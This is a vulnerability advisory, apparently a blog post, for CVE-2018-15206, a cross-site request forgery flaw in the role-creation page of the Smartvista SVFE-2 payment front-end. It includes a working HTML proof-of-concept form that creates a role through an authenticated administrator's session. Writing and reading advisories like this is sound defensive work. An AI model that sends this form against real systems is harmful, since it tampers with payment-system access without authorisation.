Cross-Site Request Forgery- Smartvista SVFE-2 Module [CVE-2018-15206]


[+] Credits: Neeraj Kumar, Raj Kumar Yadav
[+] Email: neeraj.iiita2009@gmail.com

Vendor:
====================

Product:
===================
Smartvista

Version:
===================
Smartvista Front-End (SVFE)- Version 2

Vulnerability Type:
==========================
Cross-Site Request Forgery

Affected component(s)-
==========================
createrole.jsf Page
https://<Target-IP:Port>/SVFE2/pages/admpages/roles/createrole.jsf

CVE Reference:
==============
CVE-2018-15206

Vulnerability Details:
======================
Smartvista is a suite of payment infrastructure and management systems created by BPC Group. It is vulnerable to CSRF attack meaning an attacker can perform malicious actions on behalf of valid user by sending malicious links to authenticated user via phishing/social engineering methods.

CSRF POC Code:
======================
<html>
  <!-- CSRF PoC -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://<Target-IP:Port>/SVFE2/pages/admpages/roles/createrole.jsf" method="POST">
      <input type="hidden" name="UserForm" value="UserForm" />
      <input type="hidden" name="UserForm&#58;rolename" value="Test1" />
      <input type="hidden" name="UserForm&#58;descr" value="Test22" />
      <input type="hidden" name="UserForm&#58;locations" value="2" />
      <input type="hidden" name="UserForm&#58;j&#95;id80" value="Add" />
      <input type="hidden" name="javax&#46;faces&#46;ViewState" value="j&#95;id9" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Disclosure Timeline:
=====================
Vendor Notification: 17 June 2018
Mitre Notification: 08 August 2018
Public Disclosure: 31 March 2019

Attack Type:
=====================
Remote

Impact Code execution:
=====================
True

Impact Information Disclosure:
=====================
True

Reference:
=====================

[+] Disclaimer
=====================================================
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c).

Comments

Popular posts from this blog

Polaris’ Intellect Core Banking Software Version 9.7.1- Open Redirect [CVE-2018-14931]

Stored XSS Vulnerability in Hot Scripts Clone:Script Classified Version 3.1-[CVE-2018-7650]

Stored XSS Vulnerability in Bookme Control Panel 2.0-[CVE-2018-8737]